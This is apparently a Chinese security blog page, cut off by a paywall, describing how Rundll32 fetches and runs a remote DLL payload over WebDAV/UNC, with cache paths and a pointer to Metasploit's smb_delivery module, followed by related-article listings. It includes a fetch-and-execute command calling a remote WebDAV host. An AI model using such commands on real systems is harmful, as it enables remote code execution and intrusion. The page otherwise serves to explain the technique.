Windows文件传输及执行—Rundll32

Windows系统Rundll32下载执行payload技术解析
最新推荐文章于 2025-02-16 20:41:22 发布
原创 最新推荐文章于 2025-02-16 20:41:22 发布 · 782 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了如何通过Rundll32在Windows系统中下载和执行payload,详细介绍了不同下载方式下文件的缓存位置,并讨论了使用Rundll32结合WebDAV和Metasploit的exploit/windows/smb/smb_delivery模块进行远程执行的命令格式。同时提到了Win7和Win10执行效果的差异,以及Rundll32调用内联脚本的可能性。

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Rundll32下载&执行

 使用rundll32远程下载payload并执行的命令格式为:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

网络调用进程:svchost.exe,payload缓存:WebDav 客户端本地缓存。
利用metasploit的exploit/windows/smb/smb_delivery:
配置完对应参数(无需配置payload),在目标主机cmd下执行如下命令:

rundll32.exe \\19
最低0.47元/天 解锁文章
跨平台的文件传输协议@smb协议共享方案@局域网无线文件共享和传输方案实践和推荐
xuchaoxin1375的博客
01-07 3244
局域网传输这一需求在生活中是很常见的,特别是无线传输,比很多质量一般的有线传输要快更不用提需要多用户共享的情形(比如10个人以上),用数据线或者优盘拷贝的繁琐可想而知本文介绍应用最广泛,操作最方便的文件共享传输协议(smb)及其软件实现方案推荐部分老牌文件管理器提供了相应协议的支持,并且有相应的使用文档,例如ES文件管理器,也可以供用户参考和使用(客户端推荐一节介绍)ftp和smb协议的共同点一次性配置:几乎配置一次之后不需要再配置(ftp也不需要反复配置);
rundll32.exe
12-24
rundll32.exe用于在内存中运行DLL文件,它们会在应用程序中被使用。这个程序对你系统的正常运行是非常重要的。注意:rundl132.exerundll32.exe神似。但是rundl132.exe是W32.Miroot.Worm病毒。该病毒允许攻击者访问你的计算机,窃取密码和个人数据。该进程的安全等级是建议立即删除
rundll32文件
11-18
windows xp的rundll32文件,版本5.1.2600.5512
rundll32.exe文件详解
11-08 484
平时很常听到有些朋友说:呀,我系统的注册表启动项目有rundll32.exe,系统进程也有rundll32.exe,是不是病毒呀?这是对rundll32.exe接口不了解,其实其原理非常简单,了解并掌握其原理对于我们平时的应用非常有用,特别是后面介绍的一些DLL参数应用技巧,理解了原理我们就能自己挖掘命令参数。一、Rundll32.exeRundll.exe的区别    所谓Rundll,我们可
rundll32文件详解
11-05
rundll32文件的相关详解,如:"rundll32 shell32,Control_RunDLL" - 运行控制面板 "rundll32 shell32,OpenAs_RunDLL" - 打开"打开方式"窗口
Windows10找不到msvcr100.dll文件如何弄?
最新发布
2508_90661607的博客
02-16 1680
如果刚好要调用的这个dll文件被损坏或者缺失,那就会造成无法运行的情况发生,至于dll文件缺失的原因那就可能是病毒引起、人为的错误操作、非正常的关机等这三种情况造成的。下载安装完成后,打开软件,然后点击界面左侧的“文件下载”,接着在软件界面右侧文本框中输入我们要下载的文件名,然后点击右边的下载按钮。文件下载完成后,下方列表会有很多个不同版本的文件,这里我们根据自己所需要的版本文件,点击右边的“打开”,这样就找到了下载的文件。将64位文件,放到“C:\Windows\System32”这个文件夹里面。
Windows文件下载执行的15种姿势1
08-03
rundll32是一个调用动态链接库(DLL)函数的命令行实用程序,可以用于执行某些DLL中的函数,包括下载执行。 13. **Regsvr32**: Regsvr32用于注册或卸载COM组件,但也可以通过加载恶意DLL来执行代码。 14. **...
Windows系统下的常用可执行文件及其功能简介
此外,还有一些高级工具,如`rundll32.exe`,它可以调用动态链接库函数执行更复杂的任务。`regedit.exe`则是注册表编辑器,用于管理系统的设置和配置。 值得注意的是,文档中提到的某些文件(如`progman.exe`,与...
Windows程序压缩工具ASPack优化可执行文件
随着应用程序功能日益复杂,其所依赖的库文件、资源文件以及编译后的二进制代码往往会变得庞大,导致可执行文件(EXE)或动态链接库(DLL)体积膨胀。这不仅增加了用户下载的时间成本,也对网络带宽、存储空间乃至...
windowsrundll32介绍
weixin_34006965的博客
08-29 139
最近看书介绍rundll32可以加载dll文件并执行其中导出函数,在MSDN中我们可以看到绍http://support.microsoft.com/kb/164787/zh-cn rundll32调用的函数要有特定的格式如下图: hwnd - 窗口句柄,它应该用作 DLL 创建的任何窗口的所有者窗口 hinst - DLL的实例句柄 pszCmdLine - DLL应分析的字符...
rundll32.exe丢失怎么办,这里有资源
05-17
应用平台:Windows7, WinVista, Win2003, WinXP, Win2000 安装方法: 1. 解压下载的文件。 2. 复制文件“rundll32.exe”到系统目录下。 3. 系统目录一般为:C:\WINNT\System32 64位系统为C:\Windows\SysWOW64。 4. 依次点击开始菜单-->运行-->输入“for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1”后,回车即可解决错误提示。
Invoke-TmpDavFS:内存支持的Powershell WebDav服务器
05-07
调用TmpDavFS 内存支持的Powershell WebDav服务器 描述 使用可以安装为文件系统的powershell创建支持内存的webdav服务器。 注意:在Windows上挂载远程文件系统意味着在C:\ Windows \ ServiceProfiles \ LocalService \ AppData \ Local \ Temp \ TfsStore \ Tfs_DAV系统目录中对访问的文件进行本地缓存。 用法 Import-Module .\Invoke-TempDavFS.psm1 Invoke-TempDavFS 参数 port:要监听的端口,默认为8080。 sharename:要导出的共享的名称,默认为Temp 出口:侦听所有接口而不是本地主机(需要管理员)。 auth:需要认证,默认为false。
rundll32.exe解决办法
09-20
用于解决rundll32.exe出错的问题用于解决rundll32.exe出错的问题用于解决rundll32.exe出错的问题
巧用rundll32文件
weixin_34378045的博客
11-28 159
动态链接库函数启动器——Rundll32 经常听到有些朋友说:呀!系统的注册表启动项目有rundll32.exe,系统进程也有rundll32.exe,是不是病毒呀?其实,这是对rundll32.exe接口不了解,它的原理非常简单,了解并掌握其原理对于我们平时的应用非常有用,如果能理解了原理,我们就能活学活用,自己挖掘DLL参数应用技巧。 Rundll32.exe和Rundl...
Windows系统rundll32.exe文件丢失问题
amio555的专栏
12-16 3104
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个rundll32.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现rundll32.exe丢失要怎么解决?
win7 64rundll32.exe下载_ghost win764位系统下载安装
weixin_39816260的博客
10-27 509
前几天小编闲来无事就跑到网站底下查看粉丝朋友给小编我留言询问的问题,还真的就给小编看到一个问题,那就是ghost win7,接下来小编我就话不多说,我们一起来好好学习一下吧,大家一起来看吧。1、我们首先打开电脑浏览器试试之家重装官网,将其下载好并打开。2、打开系统之家,选择备份/还原进入。3、接下来我们将界面切换到自定义还原,接下来点击下一步,需要注意的是我们在下载安装之前要关闭电脑杀毒软件,避免...
Metasploit对Rundll32
qq_41409656的博客
01-24 423
参考利用文章链接:http://www.freebuf.com/articles/terminal/135391.html     http://www.4hou.com/technology/5737.html Rundll32的利用是通过对注册动手脚,建立一个会话链接W7以上都存在,但是现在杀毒软件都监控,实验的时候关闭目标机的 杀毒软件(如:360) 通过虚拟机打物理机,下图可以
【系统工具】Rundll32Windows系统中的神奇工具,你知道吗?
kinghzking的专栏
05-29 6136
Rundll32Windows操作系统中非常有用的一个工具,它可以用来加载DLL文件中的函数,还可以用来修复Windows系统中的一些问题。Windows操作系统是全球最流行的操作系统之一,但是在使用过程中,用户可能会遇到各种各样的问题,例如程序无法正常启动、系统崩溃等等。其中,[dll文件名]是需要加载的DLL文件的文件名,[函数名]是需要调用的函数的名称, [Arguments]是参数,一个字符串。然后执行命令,会增加一个名字为inetsvr的服务。需要注意的是,不同系统中命令的运行结果是不一样的。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值